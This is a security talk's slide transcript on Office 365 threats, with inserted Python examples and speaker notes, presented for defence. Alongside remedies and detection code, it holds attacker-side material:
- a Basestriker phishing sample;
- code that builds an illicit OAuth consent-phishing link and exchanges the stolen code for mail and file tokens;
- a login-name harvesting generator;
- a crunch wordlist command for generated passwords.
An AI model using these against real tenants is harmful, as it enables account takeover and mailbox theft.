The document discusses security threats related to Office 365 from a hacker's perspective. It summarizes common ransomware attacks and techniques, such as using the <base> tag to bypass email link protections. It also demonstrates how illicit consent grants could be obtained by tricking users into granting permissions to malicious applications registered in their Azure Active Directory. The speaker advocates for restricting application registrations and consent to applications to help prevent this threat.
Office365 from a hacker's perspective: Real-life Threats, Tactics and Remedies
1. Office365 from a Hacker’s perspective
Real life threats, tactics and remedies
Twitter: @BenMenesi
http://www.ytria.com/sapio365
2. Speaker
Head of Products at Ytria
Started out in the IBM world (Admin & Developer)
SharePoint & Exchange Admin and Developer
Certified Ethical Hacker v9 and current OSCP student
Enjoys breaking things
Speaker at IT events around the globe on all things collaboration and security (SPS Toronto, Calgary, Geneva, Cambridge, Chicago etc…)
Ben Menesi (@BenMenesi)
3. Ytria
Founded in ‘99 in Montreal, Canada
Started in the IBM Software World
500+ customers, 3k orgs, 165 countries
Sapio365 GA Summer of 2018
Who we are
4. Ytria
Locally installed Administration Client for O365: Users, Groups, Teams, OneDrive & more
PowerShell-less reporting, bulk updates, unparalleled security monitoring.
Free for <50 users, 3 month key for anyone at Omaha SP UG: https://ytria.com/sapio365
What we do: sapio365
6. Statistics
Some numbers from the field
Verizon’s 2017 & 2018 Data Breach Investigations Reports: https://www.verizondigitalmedia.com/blog/2017/07/2017-verizon-data-breach-investigations-report/
53,000 incidents & 2,216 data breaches
58% of victims are businesses with < 1,000 employees (62% in 2017)
68% of breaches took months(!!!) to discover
92% of malware arrived by email (6.3% web, 1.3% other)
7. On-Prem. vs. Cloud security
Benefits of your data in the cloud
Broader scope of threat intelligence
Larger and more specialized security muscle than most SMBs
Fast and instant delivery (no manual patching required)
8. On-Prem. vs. Cloud security
Disadvantages of using cloud services
Vulnerability mitigation out of your control
Your organization is part of a larger attack surface
Less wiggle-room to tailor defenses to your needs
9. Ransomware
Practical example
Basestriker attack: gets around Microsoft’s ATP Safe Links by leveraging the HTML <base> tag. Safe Links rewrites and checks the URL it finds in a link’s href; with Basestriker the href holds only a relative path and the <base> element in the message head supplies the host, so the scanner never assembles the real destination while the recipient’s mail client does.
Traditional way to embed URLs in a phishing email: the full URL sits in the link’s href (screenshot)
Using the <base> tag: the host moves into <base href> and the link keeps only the path (screenshot)
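The split described above, as an added example that is not part of the talk: a collector that reads href attributes in isolation (the way a naive link filter does) versus one that resolves every href against the message’s <base>. The two sample messages, the placeholder domains and the trusted-host list are constructed for the example.

```python
"""Added example (not from the talk): how a <base href> splits a phishing URL
so that a scanner reading only href attributes never sees the full destination,
and how resolving against <base> closes the gap. All domains are placeholders."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample emails (placeholder domains, not real infrastructure).
TRADITIONAL_MAIL = """
<html><body>
<p>Your mailbox is almost full.</p>
<a href="https://phish.example.invalid/owa/login.php">Review storage</a>
</body></html>
"""

BASESTRIKER_MAIL = """
<html><head><base href="https://phish.example.invalid/owa/"></head><body>
<p>Your mailbox is almost full.</p>
<a href="login.php">Review storage</a>
</body></html>
"""


class LinkCollector(HTMLParser):
    """Collects the first <base href> and every <a href> as written in the markup."""

    def __init__(self):
        super().__init__()
        self.base = None
        self.raw_hrefs = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "base" and self.base is None and attrs.get("href"):
            self.base = attrs["href"]          # browsers honour only the first <base>
        elif tag == "a" and attrs.get("href"):
            self.raw_hrefs.append(attrs["href"])


def naive_links(html):
    """What a filter sees if it inspects href attributes in isolation."""
    parser = LinkCollector()
    parser.feed(html)
    return parser.raw_hrefs


def resolved_links(html):
    """Effective destinations: every href resolved against <base> when present."""
    parser = LinkCollector()
    parser.feed(html)
    return [urljoin(parser.base or "", href) for href in parser.raw_hrefs]


def offsite_links(html, trusted_hosts):
    """Links whose effective host is outside the allow-list.
    A relative href resolves to None as hostname in the naive view, so only the
    resolved view can answer this correctly."""
    return [url for url in resolved_links(html)
            if urlsplit(url).hostname not in trusted_hosts]
```

The naive collector reports `login.php` for the Basestriker message, which is exactly why a filter keyed on the href attribute alone has nothing to rewrite; the resolved view yields the same absolute URL for both messages.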
11. Ransomware
A more recent attack: MFA bypass via IMAP
https://www.proofpoint.com/us/threat-insight/post/threat-actors-leverage-credential-dumps-phishing-and-legacy-email-protocols
Highlights (details discussed later)
100,000+ unauthorized logins analyzed (December 2018 onwards)
72% of tenants were targeted at least once
40% of tenants had at least 1 compromised account
15 of every 10,000 active user accounts breached
13. Ransomware attacks
Why are they so important?
DOJ statistics: 1,000 attacks / day in 2015, 4,000 attacks / day in 2017
WannaCry: 150 countries, estimated at $4B
NotPetya: $250-300M for Maersk alone, $1.2B in total revenue
54% of companies experienced one or more successful attacks
Total cost of a successful cyber attack is over $5M, or $301 / employee
14. How do they spread?
Ransomware Protection
60% of ransomware attacks come from infected emails BUT:
Also vulnerable (application) servers
Example: city of Atlanta hit by SamSam (originally discovered in 2016) in 2018
Malware infection likely through SMBv1 open on a web server
Aftermath: $2.6M cost
Conclusion: Update, patch, pay attention to cyber hygiene!
15. Cautionary tale: Herrington & Company gets ransomwared
Engages a data recovery company to retrieve the data
DR company quotes $6,000 to recover the data
Data recovery is WAY too fast
FBI confirms that PDR indeed paid the ransom to decrypt the victim’s files
https://pbs.twimg.com/media/DbfP0G7WAAEWQIa.jpg:large
How do we prevent ransomware?
Decrypting Ransomware
Ransomware Protection
16. Microsoft introduced Files Restore
Office365 Ransomware Protection
Ransomware Protection
OneDrive
Allows restoring an entire OneDrive account to a previous point in time within 30 days
Monitors file assets and notifies if an attack is detected
17. Careful!
Office365 Ransomware Protection
Ransomware Protection
Real-time notification might not be as accurate as we think: AxCrypt encryption of files in OneDrive flies easily under the radar.
Ransomware prevention: have users store important data in OneDrive so Files Restore can roll it back (but remember that ransomware encrypts everything else on the endpoint too).
19. Email Encryption
Email encryption
New(ish) advanced email protection options
End-to-end encryption (caveat: OME keys live in Microsoft’s Azure Information Protection service, so this is encryption under Microsoft’s keys rather than end-to-end in the strict sense)
Prevent Forwarding: restrict email recipients from forwarding or copying emails you send (plus: MS Office docs attached stay encrypted even after downloading)
What happens if the recipient is outside your organization: (screenshot)
21. OME Viewer App – now deprecated
Email encryption
New advanced email protection options
The iOS mail app didn’t support decrypting messages protected by OME.
Rights restrictions become void (although if the recipient is on an Office365 mail server, forwarding such a mail is still not allowed)
To toggle this: Set-ActiveSyncOrganizationSettings -AllowRMSSupportForUnenlightenedApps <$true|$false>
Note: previously encrypted messages won’t be viewable on iOS
Review what’s new in OME: https://docs.microsoft.com/en-us/office365/securitycompliance/set-up-new-message-encryption-capabilities
Tip: customize your OME message look and feel: https://support.office.com/en-us/article/add-your-organizations-brand-to-your-encrypted-messages-7a29260d-2959-42aa-8916-feceff6ee51d
22. Revoking Encrypted Messages
Email encryption
This one is thanks to Albert Hoitingh: https://alberthoitingh.com/2018/12/20/ome-message-revocation/
An Encrypted status means the email and its content never left the perimeter; the recipient only holds a link to it.
You can use Message Trace to locate the outgoing mail and then use PowerShell to:
Query the OME status: Get-OMEMessageStatus -MessageId "<message id>"
Set the message as revoked: Set-OMEMessageRevocation -Revoke $true -MessageId "<message id>"
23. Revoking Encrypted Messages
Email encryption
Because the data never left the perimeter, it’s the ‘link’ that’s broken at the moment of revocation, and the recipient will get this: (screenshot)
25. Azure AD applications
Illicit Consent Grants
In the light of the Facebook Cambridge Analytica scandal, we should take a look at Azure AD registered applications
Phishing campaigns could trick users into granting access to applications
https://blogs.technet.microsoft.com/office365security/defending-against-illicit-consent-grants/
Exploit first demonstrated by Kevin Mitnick
26. Azure AD applications
Exploit Scenario
Demo
Infrastructure (diagram): User, Apache web server, Hacker
27. Azure AD applications
Infrastructure – bit more detail (Thanks to Albert Hoitingh)
Exploit Scenario
29. Azure AD applications
Exploit Scenario
User receives a legit-looking email: (screenshot)
30. Azure AD applications
Exploit Scenario
Picks an account to authenticate (screenshot)
31. Azure AD applications
Exploit Scenario
Presented with permissions that need consent (and they make sense) (screenshot)
32. Azure AD applications
Exploit Scenario
All mails encrypted
… and this is just one of many outcome possibilities
33. Azure AD applications
Introduction – Digital #metoo era: Consent is key!
Why build integrated applications?
Using various APIs, you can grant apps access to your tenant data: mail, calendars, contacts, conversations; users, groups, files and folders; SharePoint sites, lists, list items; OneDrive items, permissions and more
Integration: Azure AD provides secure sign-in and authorization
Developer registers the application with Azure AD
Assigns permissions to the application
Tenant administrator / user must consent to the permissions
34. Azure AD applications
Registering the application
Who can register applications in your tenant?
By default: any member (the Azure AD user setting “Users can register applications” is Yes)! This can be a security issue.
Keep in mind: there is a record of what data was shared with which application. Also: when a user adds / allows an application to access their data, the event can be audited (Audit reports)
See more: https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-how-applications-are-added#who-has-permission-to-add-applications-to-my-azure-ad-instance
35. Azure AD applications
Azure AD Endpoints: Endpoint 1
Endpoint v1: Azure AD Admin center (aad.portal.azure.com) > Enterprise Applications > New Application
36. Azure AD applications
Azure AD Endpoints: Endpoint 1
Endpoint v1 properties
Only supports 1 platform / application
Supports ALL APIs
Static permissions
37. Azure AD applications
Azure AD Endpoints: Endpoint 2
Endpoint v2 properties (apps.dev.microsoft.com)
Supports multiple platforms
Only supports Graph API
Scopes vs. Resources (dynamic permissions)
Strategic new direction for Microsoft
Gotcha: v1 and v2 aren’t compatible!
38-41. Azure AD applications
Registering the application
What you’ll need:
Application Name
Application password (client secret)
Platform
Redirect URL(s)
Owner(s)
Permissions: Delegated / Application
42. Azure AD applications
Permissions
Azure AD v1 endpoint permissions (delegated only): 87
Azure AD v2 endpoint permissions
Delegated: 77
Application: 39
43. Azure AD applications
Consent
Application will access and do stuff on your behalf: consent required
Two types of consent:
User can consent (limited-scope actions, delegated permissions only)
Admin must consent (larger-scope actions, some delegated, all application permissions)
45. Azure AD applications
Authorization flow
How does it work?
User consents to the permissions required by the app
Application asks for authorization from Azure AD
Azure AD makes the user sign in and returns an authorization code to the application’s redirect URL
Application exchanges the code for a JWT bearer access token (plus a refresh token if offline_access was granted) and uses it against the resource (Microsoft Graph API)
Keep in mind: the access token is a bearer token. It proves nothing about who presents it, only what the holder is allowed to do.
Hijacking the JWT token is therefore extremely dangerous: anyone holding it has the granted access until it expires, no password or MFA required.
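The exploit scenario of the demo and the authorization flow above, as an added example that is not part of the talk: the consent URL an attacker’s registered app sends the victim to, the callback that delivers the authorization code, the token request that exchanges it, and a look inside the resulting bearer token. Nothing is sent over the network; `CLIENT_ID`, `REDIRECT_URI`, the secret and the sample token are placeholders, and the scope list is an assumed set of user-consentable delegated permissions.

```python
"""Added example (not from the talk): the authorization-code flow behind an
illicit consent grant, built as plain HTTP requests without sending them.
client_id, redirect_uri, client_secret and the sample token are placeholders."""
import base64
import json
from urllib.parse import parse_qs, urlencode, urlsplit

AUTHORIZE = "https://login.microsoftonline.com/common/oauth2/v2.0/authorize"
TOKEN = "https://login.microsoftonline.com/common/oauth2/v2.0/token"

# Placeholder app registration (the attacker registers it in their own tenant).
CLIENT_ID = "00000000-0000-0000-0000-000000000000"
REDIRECT_URI = "https://phish.example.invalid/callback"
# Delegated scopes a plain user can consent to (assumed set). offline_access
# yields a refresh token, so access outlives the victim's browser session.
SCOPES = ["openid", "offline_access", "User.Read", "Mail.ReadWrite", "Files.ReadWrite.All"]


def build_consent_url(state):
    """The link embedded in the phishing mail; prompt=consent forces the grant screen."""
    params = {"client_id": CLIENT_ID, "response_type": "code",
              "redirect_uri": REDIRECT_URI, "response_mode": "query",
              "scope": " ".join(SCOPES), "state": state, "prompt": "consent"}
    return f"{AUTHORIZE}?{urlencode(params)}"


def parse_callback(url, expected_state):
    """Extract the auth code the victim's browser delivers to the redirect URL.
    Returns None when consent was declined or blocked by tenant policy."""
    qs = parse_qs(urlsplit(url).query)
    if qs.get("state", [None])[0] != expected_state:
        raise ValueError("state mismatch: not our request")
    if "error" in qs:
        return None
    return qs["code"][0]


def build_token_request(code, client_secret):
    """Body of the POST that turns the code into access (and refresh) tokens."""
    body = {"client_id": CLIENT_ID, "client_secret": client_secret,
            "grant_type": "authorization_code", "code": code,
            "redirect_uri": REDIRECT_URI, "scope": " ".join(SCOPES)}
    return TOKEN, urlencode(body)


def _b64url_decode(segment):
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def token_claims(jwt):
    """Read a JWT payload without verifying it. Graph accepts the token from
    whoever presents it, so these claims are what a stolen token buys."""
    _header, payload, _signature = jwt.split(".")
    return json.loads(_b64url_decode(payload))


def sample_token():
    """Constructed, unsigned token shaped like a Graph access token (placeholder)."""
    def enc(obj):
        return base64.urlsafe_b64encode(json.dumps(obj).encode()).decode().rstrip("=")
    payload = {"aud": "https://graph.microsoft.com", "upn": "alice@contoso.example",
               "scp": "Mail.ReadWrite Files.ReadWrite.All User.Read offline_access"}
    return ".".join([enc({"alg": "none"}), enc(payload), ""])
```

The `state` check is the one piece of this flow that protects the attacker rather than the victim; from the defender’s side, the `scp` claim and the presence of a refresh token are what decide how bad a consent grant is.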
46. Azure AD applications
How do you prevent illicit consent grants
Application Registration & consent restrictions
Regular application & permission enumeration
Cloud App Security
Educate users
47. Azure AD applications
Remedy: Restricting app registrations
Azure Portal > Azure Active Directory > User settings > “Users can register applications”: No
48. Azure AD applications
Remedy: Restricting consent grants
Azure Portal > Azure Active Directory > User settings > Enterprise applications > “Users can consent to apps accessing company data on their behalf”: No
49. Azure AD applications
Remedy: Restricting consent & app registrations
While we’re at it…
Ordinary users are by default allowed to access the Azure AD administration portal, allowing them to view:
All users’ group memberships
All users’ assigned licenses and enabled services
All users’ directory roles (find global administrator accounts)
Best to disable this: Azure Active Directory > User settings > Administration portal > “Restrict access to Azure AD administration portal”: Yes
(Note: this only hides the portal; the same directory data stays readable through PowerShell and the Graph API unless default user permissions are restricted too.)
50. Azure AD applications
Remedy: Enumerating apps and permissions
Enumerating applications using PowerShell:
Install the AzureAD PowerShell module
Launch PowerShell ISE as an Administrator and:
Install-Module AzureAD
Connect to Azure AD:
Connect-AzureAD
Use the PowerShell script:
https://gist.github.com/psignoret/41793f8c6211d2df5051d77ca3728c09
Example:
.\Get-AzureADPSPermissions.ps1 | Export-Csv -Path "permissions.csv" -NoTypeInformation
51. Azure AD applications
What you get:
Remedy: Enumerating apps and permissions
52. Azure AD applications
Remedy: Enumerating apps and permissions
Gotcha: the permissions script won’t show redirect URLs!
To get apps and their redirect URLs: Get-AzureRmADApplication
Requires the AzureRM.Resources module and Connect-AzureRmAccount (the AzureAD module’s Get-AzureADApplication also exposes them in its ReplyUrls property):
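Once the permissions export exists, the job is to rank the grants. The following is an added example, not part of the talk or of the enumeration script: a triage over a CSV shaped like that script’s output. The column set is a simplified subset of the real output, the rows are constructed, and the risk weights are an assumption to be tuned per tenant.

```python
"""Added example (not from the talk): triage of an exported permissions list.
The CSV columns are a simplified subset of the enumeration script's output and
every row is constructed; the scoring weights are an assumption."""
import csv
import io
from collections import defaultdict

SAMPLE_CSV = """PermissionType,ClientDisplayName,ResourceDisplayName,Permission,ConsentType,PrincipalDisplayName
Delegated,Microsoft Teams,Microsoft Graph,User.Read,AllPrincipals,
Delegated,Mailbox Cleaner,Microsoft Graph,Mail.ReadWrite,Principal,Alice Example
Delegated,Mailbox Cleaner,Microsoft Graph,offline_access,Principal,Alice Example
Delegated,Mailbox Cleaner,Microsoft Graph,Files.ReadWrite.All,Principal,Alice Example
Application,HR Sync,Microsoft Graph,User.Read.All,AllPrincipals,
Delegated,Calendar Widget,Microsoft Graph,Calendars.Read,Principal,Bob Example
"""

# Assumed weights: scopes that let an app change or exfiltrate data outrank
# read-only ones, and a refresh token (offline_access) buys persistence.
HIGH_RISK = {"Mail.ReadWrite", "Mail.Send", "Files.ReadWrite.All", "Sites.ReadWrite.All",
             "Directory.ReadWrite.All", "MailboxSettings.ReadWrite"}
PERSISTENCE = {"offline_access"}


def score_permission(permission):
    if permission in HIGH_RISK:
        return 3
    if permission in PERSISTENCE:
        return 2
    if permission.endswith(".All") or ".ReadWrite" in permission:
        return 2
    return 1  # read-only, single-user scope


def triage(csv_text):
    """Group grants by client app and return (app, score, permissions, user_consented)
    tuples, highest score first."""
    apps = defaultdict(lambda: {"perms": set(), "types": set(), "user_consented": False})
    for row in csv.DictReader(io.StringIO(csv_text)):
        app = apps[row["ClientDisplayName"]]
        app["perms"].add(row["Permission"])
        app["types"].add(row["PermissionType"])
        # ConsentType "Principal" = one user consented; no admin ever reviewed it.
        app["user_consented"] |= row["ConsentType"] == "Principal"
    ranked = []
    for name, app in apps.items():
        score = sum(score_permission(p) for p in app["perms"])
        if app["user_consented"]:
            score += 2
        if "Application" in app["types"]:
            score += 2  # application permissions run with no signed-in user at all
        ranked.append((name, score, sorted(app["perms"]), app["user_consented"]))
    ranked.sort(key=lambda item: item[1], reverse=True)
    return ranked


def suspicious_apps(csv_text, threshold=5):
    """Apps whose combined grant score crosses the threshold: review these first."""
    return [name for name, score, _perms, _user in triage(csv_text) if score >= threshold]
```

An app that a single user consented to, holding Mail.ReadWrite plus offline_access, is the exact shape of the demo’s payload and lands at the top of the list; a read-only gallery app consented by an admin stays at the bottom.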
53. Azure AD applications
Remedy: Searching your Audit Logs
Use the “consent” string to filter (the relevant activity is “Consent to application”):
54. Azure AD applications
Create an OAUTH App Security Policy
Remedy: Cloud App Security
58. Brute force attacks
Brute forcing office365 logins
In the news in August 2017: sophisticated and coordinated attack against 48 Office365 customers
Brute force attack unique in targeting multiple cloud providers
100,000 failed login attempts from 67 IPs and 12 networks over 7 months
Slow and low to avoid intrusion detection
Targeted users saw unsuccessful login attempts against up to 17 variations of their name
Passwords likely the same across accounts (password spray attack)
https://www.tripwire.com/state-of-security/featured/new-type-brute-force-attack-office-365-accounts/
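The “slow and low” pattern above is the defender’s handle on a spray: one source touches many accounts with one or two guesses each, whereas a classic brute force hammers one account. The following is an added example, not from the talk, that tells the two apart from sign-in records and lists the accounts a spraying source eventually got into. The log lines are constructed in a simplified one-line form (real Azure AD sign-in logs are JSON exports), and the window and thresholds are assumptions to tune.

```python
"""Added example (not from the talk): separating a low-and-slow password spray
from a single-account brute force in sign-in records. Records are constructed in
a simplified form; thresholds are assumptions."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed records: timestamp, source IP, user, result
SAMPLE_LOG = """\
2019-03-01T08:00:00Z 203.0.113.7 alice@contoso.example failure
2019-03-01T08:41:00Z 203.0.113.7 bob@contoso.example failure
2019-03-01T09:20:00Z 203.0.113.7 carol@contoso.example failure
2019-03-01T10:05:00Z 203.0.113.7 dave@contoso.example failure
2019-03-01T10:50:00Z 203.0.113.7 erin@contoso.example failure
2019-03-01T11:30:00Z 203.0.113.7 frank@contoso.example success
2019-03-01T08:00:00Z 198.51.100.9 alice@contoso.example failure
2019-03-01T08:00:05Z 198.51.100.9 alice@contoso.example failure
2019-03-01T08:00:10Z 198.51.100.9 alice@contoso.example failure
2019-03-01T08:00:15Z 198.51.100.9 alice@contoso.example failure
2019-03-01T12:00:00Z 192.0.2.44 alice@contoso.example success
"""


def parse(log_text):
    rows = []
    for line in log_text.splitlines():
        ts, ip, user, result = line.split()
        rows.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), ip, user, result == "success"))
    return rows


def classify_sources(rows, window=timedelta(hours=6), min_users=5, max_per_user=2):
    """Per source IP: 'spray' when, inside one window, many distinct users each see
    only a few failures; 'bruteforce' when one user absorbs them all; else None.
    Each verdict is paired with the accounts that source later signed in to."""
    by_ip = defaultdict(list)
    for ts, ip, user, ok in rows:
        by_ip[ip].append((ts, user, ok))
    verdicts = {}
    for ip, events in by_ip.items():
        events.sort()
        failures = [(ts, user) for ts, user, ok in events if not ok]
        succeeded = [user for _, user, ok in events if ok]
        verdict = None
        for i, (start, _) in enumerate(failures):        # slide a window over failures
            in_window = [user for ts, user in failures[i:] if ts - start <= window]
            per_user = defaultdict(int)
            for user in in_window:
                per_user[user] += 1
            if len(per_user) >= min_users and max(per_user.values()) <= max_per_user:
                verdict = "spray"
                break
            if len(per_user) == 1 and len(in_window) >= 4:
                verdict = "bruteforce"
                break
        if verdict or succeeded:
            verdicts[ip] = (verdict, succeeded)
    return verdicts


def spray_hits(verdicts):
    """Accounts a spraying source eventually signed in to: reset these first."""
    return sorted(user for verdict, users in verdicts.values()
                  if verdict == "spray" for user in users)
```

The lockout counter on its own never fires for the spraying IP (one failure per account), which is why the grouping has to be by source rather than by user.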
59. Brute force attacks
Demo
How hard is it to acquire the right login names?
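The demo’s question, as an added example that is not part of the talk: given names scraped from public sources and one address already confirmed (say, from a mail signature or a search result), infer the tenant’s naming convention and produce a login candidate for every harvested name. The template set is an assumption covering common conventions, and all names and the domain are constructed.

```python
"""Added example (not from the talk): turning harvested names into login
candidates by inferring the naming convention from one confirmed address.
Templates are an assumed set; names and domains are constructed."""
import re

TEMPLATES = {
    "first.last": "{first}.{last}",
    "flast":      "{f}{last}",
    "firstl":     "{first}{l}",
    "first_last": "{first}_{last}",
    "lastf":      "{last}{f}",
    "first":      "{first}",
    "last.first": "{last}.{first}",
}


def _parts(full_name):
    """'Ben Menesi' -> first/last plus initials. Middle tokens and particles
    ('van', 'de') are dropped: the last token is taken as the surname."""
    tokens = [re.sub(r"[^a-z]", "", t.lower()) for t in full_name.split()]
    tokens = [t for t in tokens if t]
    first, last = tokens[0], tokens[-1]
    return {"first": first, "last": last, "f": first[0], "l": last[0]}


def render(template_key, full_name, domain):
    return TEMPLATES[template_key].format(**_parts(full_name)) + "@" + domain


def infer_format(known_email, known_name):
    """Template keys that reproduce the confirmed address from its owner's name."""
    local, _domain = known_email.lower().split("@")
    return [key for key, tpl in TEMPLATES.items() if tpl.format(**_parts(known_name)) == local]


def candidate_logins(names, known_email, known_name):
    """One login candidate per harvested name and matching template; when the
    convention cannot be inferred, every template is tried."""
    domain = known_email.split("@")[1]
    keys = infer_format(known_email, known_name) or list(TEMPLATES)
    return sorted({render(key, name, domain) for name in names for key in keys})
```

With the convention pinned down the candidate list is one address per person, which is what makes the subsequent spray cheap for the attacker and, read the other way, why a tenant should expect its naming convention to be known.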
60. Brute force attacks
Account Lockout in Office365
Before this Tuesday (02/04/2019):
10 unsuccessful attempts: captcha
Another 10: lockout (10 mins)
In reality: 10 tries = lockout
No customization allowed
61. Brute force attacks
Account Lockout in Office365
As of Tuesday 02/04/2019 – WOOHOO! Azure AD Password Protection (with a configurable smart lockout threshold and duration) is generally available:
https://techcommunity.microsoft.com/t5/Azure-Active-Directory-Identity/Azure-AD-Password-Protection-is-now-generally-available/ba-p/377487
62. Authentication
Multi Factor Authentication
Focus: cloud only -> Azure Active Directory MFA
Grants access only after a second factor on top of the password: PIN, security token, device or biometrics.
Free support for MFA on Office365 apps.
Interesting story:
What could’ve stopped all this? MFA
63. Authentication
MFA: true story
I’ll just put this here…
Thanks to @RachelTobac for this gem:
https://goo.gl/CFcA5t
64. Authentication
MFA – true story
Good news: management through the app is better
65. Authentication
MFA – the elephant in the room
2 serious outages in 2018 alone.
66. Authentication
MFA – in case of emergencies
Consider implementing a break-glass account (excluded from the baseline MFA policy): https://practical365.com/security/multi-factor-authentication-default-for-admins/
Azure AD Portal > Conditional Access
Give it a long random password kept offline, exclude it from every Conditional Access policy, and alert on any sign-in with it.
67. Authentication
The way around MFA
Recent breaches discovered by Proofpoint
https://www.proofpoint.com/us/threat-insight/post/threat-actors-leverage-credential-dumps-phishing-and-legacy-email-protocols
Essentially: using IMAP to get around MFA. Legacy protocols authenticate with username and password only (basic authentication), so a tool mimicking a legacy mail client and holding a valid password is never challenged for a second factor.
68. Authentication
The way around MFA
Microsoft’s response: https://docs.microsoft.com/en-us/microsoft-365/enterprise/secure-email-recommended-policies
Require MFA
Block clients that don’t support modern auth (IMAP, POP and SMTP AUTH use basic authentication, which MFA cannot protect)
Disable app passwords (they are static secrets that bypass MFA by design)
69. Attack Simulation
The all new Office365 Attack Simulator
Available as part of Threat Intelligence (available in Office365 Enterprise E5)
Follows logical penetration testing steps
Requirements
You must be a global administrator or a member of the Security Administrator role group in the Security & Compliance Center AND have MFA enabled on your account.
Attack simulations must be set up
What does it allow you to do?
Spear Phishing Campaigns
Password Brute-Force Attacks
Password Spray Attacks
70. Attack Simulation
The all new Office365 Attack Simulator
Where to find it: protection.office.com / Threat Management
71. Attack Simulation
Spear Phishing campaigns
Only works for individual users (no groups for now)
Tip: target users identified as top targeted in the Threat Management dashboard
Tip 2: You’ll need to enable Office Analytics
72. Attack Simulation
Spear Phishing campaigns
User tries to log in to the phishing site
Redirected to the awareness page
73. Attack Simulation
Spear Phishing campaigns
Tip: best to use your own phishing sites; Google has already flagged most of the built-in ones.
74. Attack Simulation
Brute Force Password
Use a pre-set word list against one or multiple user accounts
Uses the same method an attacker would
I mean literally: watch out! Currently this locks out the user account.
Only supports very limited password lists (Internal server error at 10k passwords)
Best online resources for common credentials: https://github.com/danielmiessler/SecLists/tree/master/Passwords/Common-Credentials
75. Attack Simulation
Password Spray Attack
Tries one or a few passwords against all accounts
Story: a known password sprayed against two accounts
Both accounts DID have that password, but only one was reported as compromised
Why?
Gotcha: the second user had MFA enabled, which the simulator doesn’t appear to support (the password was reported as not accepted and no MFA prompt fired).
76. Threat Tracker
Tracks major malware campaigns (WannaCry, Petya, etc.)
Lets you track the impact of these campaigns in your tenant
Generally available in Office365 – Security & Compliance
77. Office365 passwords
About generating random passwords
Current (4th April 2019) generated password format isn’t hard to guess: (screenshot)
Tip: make sure users change their passwords on first login
79. Office365 passwords
Guessing random passwords
Pretty easy to create a password list for brute-force:
Using crunch: crunch 8 8 aeiou BCDFGHJKLMNPQRSTVWXYZ 0123456789 bcdfghjklmnpqrstvwxyz -t ,@^%%%%%
(crunch maps the four charsets to the placeholders @ lowercase, , uppercase, % digit and ^ symbol in that order, so the pattern reads: uppercase consonant, vowel, lowercase consonant, five digits)
File size: about 220 million candidates, roughly 2 GB
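The same candidate space the crunch command above enumerates, as an added example that is not part of the talk: a generator in the same order crunch emits, the exact size of the space, and a checker that tells whether a password still has the generated shape. The charsets and pattern are taken from the crunch invocation; the byte estimate assumes one candidate per line.

```python
"""Added example (not from the talk): the candidate space behind the crunch
command, generated in Python so its size can be computed and a sample checked
against the generated-password format. Charsets follow the crunch invocation."""
import itertools
import re

VOWELS = "aeiou"
UPPER_CONS = "BCDFGHJKLMNPQRSTVWXYZ"
LOWER_CONS = "bcdfghjklmnpqrstvwxyz"
DIGITS = "0123456789"

# crunch -t placeholders: ',' uppercase, '@' lowercase, '%' digit, '^' symbol.
# The command hands crunch four charsets in the order lowercase, uppercase,
# digits, symbols, so '^' (the symbol slot) is bound to the lowercase consonants.
PATTERN = ",@^%%%%%"
CHARSETS = {"@": VOWELS, ",": UPPER_CONS, "%": DIGITS, "^": LOWER_CONS}


def keyspace_size(pattern=PATTERN, charsets=CHARSETS):
    size = 1
    for placeholder in pattern:
        size *= len(charsets[placeholder])
    return size


def candidates(pattern=PATTERN, charsets=CHARSETS):
    """Lazily yields every password matching the pattern, in crunch's order."""
    for combo in itertools.product(*(charsets[p] for p in pattern)):
        yield "".join(combo)


def first_n(n):
    return list(itertools.islice(candidates(), n))


FORMAT_RE = re.compile(rf"^[{UPPER_CONS}][{VOWELS}][{LOWER_CONS}][{DIGITS}]{{5}}$")


def looks_autogenerated(password):
    """True if a password still has the shape of the portal's generated ones,
    i.e. the user never changed it after first login."""
    return FORMAT_RE.fullmatch(password) is not None


def wordlist_bytes(pattern=PATTERN, charsets=CHARSETS):
    """Size of the file crunch would write: one candidate plus newline per line."""
    return keyspace_size(pattern, charsets) * (len(pattern) + 1)
```

Two hundred million candidates is trivial for an offline attack and still tractable for an online spray spread over many accounts, which is the point of the slide: the strength is in the format, not in the randomness of the characters.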
80. Office365 passwords
Conclusion
Simulate attacks against your own environment
Keep an eye out for more attack simulation tools
Use your own phishing tactics and word lists
Educate users on strong passwords
81. Check out sapio365
Download sapio365 (free for 3 months): www.ytria.com/sapio365
And let’s see what that last point means via an example
… for cloud security weaknesses
Normally using MS ATP: goes to a safe Ms domain url
https://www.avanan.com/resources/basestriker-vulnerability-office-365
… for cloud security weaknesses
To research: is this really not fixed yet?
https://www.avanan.com/resources/basestriker-vulnerability-office-365
Took 14 days
Ransomware protection: https://thehackernews.com/2018/04/microsoft-office-ransomware.html
Ransomware and office365: https://spanning.com/blog/need-know-ransomware-attacks-office-365/
https://www.scmagazine.com/microsoft-adds-ransomware-protection-recovery-tools-to-office-365/article/756577/
To look into: Versioning?
Try AxCrypt on my data! Does O365 notice this?
Keep in mind: ransomware won’t just encrypt OneDrive but everything else, too!
https://www.microsoft.com/en-us/microsoft-365/blog/2018/04/05/defend-yourself-from-cybercrime-with-new-office-365-capabilities/
This needs to be enabled!
https://support.office.com/en-us/article/set-up-new-office-365-message-encryption-capabilities-built-on-top-of-azure-information-protection-7ff0c040-b25c-4378-9904-b1b50210d00e
https://support.office.com/en-us/article/office-365-message-encryption-ome-f87cb016-7876-4317-ae3c-9169b311ff8a
Mention: OneDrive sharing
https://support.office.com/en-us/article/manage-office-365-message-encryption-09f6737e-f03f-4bc8-8281-e46d24ee2a74
However, it works in the Outlook app?
[Needs more work]: Mail flow rules https://support.office.com/en-us/article/define-mail-flow-rules-to-encrypt-email-messages-in-office-365-9b7daf19-d5f2-415b-bc43-a0f5f4a585e8
We feel pretty good about o365 applications right? We’re not facebook. Wrong!
Set guilbon to listen. Copy code from consent post and show guilbon get token in Postman.
https://graph.microsoft.com/v1.0/sites?search=*
https://graph.microsoft.com/v1.0/users
Let’s first understand Azure AD Applications. They are cool.
Historically this is an improvement:
